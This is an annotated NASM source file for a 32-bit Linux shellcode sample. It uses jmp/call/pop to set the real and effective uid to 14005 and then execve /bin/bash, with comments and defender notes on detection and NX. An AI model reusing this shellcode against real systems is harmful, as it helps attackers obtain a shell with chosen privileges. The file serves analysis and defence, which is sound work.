;-----------------------------------------------------------------------
; Linux i386 sample (32-bit registers, int 0x80 syscall interface), NASM
; syntax, built around the jmp/call/pop pattern.
;
; Flow:  _start jumps to `data`; the `call exploit` there pushes the
;        address of the bytes that follow it (the cmd string) and
;        transfers control to `exploit`.
;        `exploit` issues syscall 203 (setreuid32 in the i386 table)
;        with ebx = ecx = 14005, then syscall 11 (execve) with ebx = cmd.
;
; Analyst / defender notes:
;  - A change of real/effective uid to a fixed value followed directly
;    by execve of a shell is a sequence worth alerting on in syscall
;    audit telemetry.
;  - The store to [edx + 10] writes next to the code (no section
;    directive is visible, so code and string share one section); it
;    needs memory that is both writable and executable, so W^X / NX
;    mappings make it fault.
;  - `mov ebx, cmd` embeds the assembled address of cmd, while the
;    address popped into edx is the run-time one.
;-----------------------------------------------------------------------
global _start
_start:
jmp short data              ; skip forward so the call below can push the string address
exploit:
xor edx, edx                ; edx = 0
xor eax, eax ; set reuid    ; eax = 0 before loading the syscall number into al
xor ebx, ebx                ; ebx = 0 (first syscall argument)
xor ecx, ecx                ; ecx = 0 (second syscall argument)
mov al, 203                 ; eax = 203: setreuid32 on i386 Linux
mov bx, 14005               ; ebx = 14005 (ruid); 16-bit write into a zeroed register
mov cx, 14005               ; ecx = 14005 (euid); NOTE(review): the 8/16-bit moves presumably keep zero bytes out of the encoding
int 0x80                    ; setreuid32(14005, 14005); the return value in eax is not checked
xor eax, eax                ; eax = 0 again: the zero source for the store below and a clean upper half for al
xor ebx, ebx                ; ebx = 0
xor ecx, ecx                ; ecx = 0 (second execve argument, argv, stays NULL)
pop edx                     ; edx = return address pushed by `call exploit`, i.e. the address of cmd
mov [edx + 10], eax         ; store four zero bytes at offset 10 from the popped address (write into the code region)
mov al, 11                  ; eax = 11: execve on i386 Linux
mov ebx, cmd                ; ebx = assembled address of cmd (first execve argument, the path)
int 0x80                    ; execve(cmd, NULL, edx); edx still holds the popped address here
                            ; nothing follows this syscall: if it returns, execution falls through into `data`
data:
call exploit ; pushes the address of the next bytes (the cmd string) on the stack and jumps to `exploit`
cmd: db '/bin/bash'         ; 9-byte path literal with no terminator in the assembled bytes